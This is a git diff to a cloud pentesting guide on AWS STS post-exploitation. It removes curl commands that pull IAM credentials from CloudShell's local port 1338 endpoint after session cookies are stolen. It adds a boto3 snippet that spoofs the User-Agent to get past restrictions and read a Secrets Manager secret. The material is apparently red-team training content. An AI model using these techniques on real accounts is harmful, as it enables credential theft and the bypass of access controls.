diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
index 01db4ad416..7a03ece8eb 100644
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -101,16 +101,24 @@ aws-vault login jonsmith # Open a browser logged as jonsmith
 You can also use **aws-vault** to obtain an **browser console session**
 {% endhint %}
 
-#### From Console to IAM Creds
+### **Bypass User-Agent restrictions from Python**
 
-[**Originally discovered in this post**](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/), If you manage to compromise some access to a web console (maybe you stole cookies and could't access the .aws folder), you can obtain some IAM token credentials for that user through **CloudShell**.
-
-CloudShell exposes IAM credentials via an **undocumented endpoint on port 1338**. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.
+If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
 
+{% code overflow="wrap" %}
 ```bash
-TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
-curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
+# Shared by ex16x41
+# Create a client
+session = boto3.Session(profile_name="lab6")
+client = session.client("secretsmanager", region_name="us-east-1")
+
+# Change user agent of the client
+client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )
+
+# Perform the action
+response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
 ```
+{% endcode %}
 
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\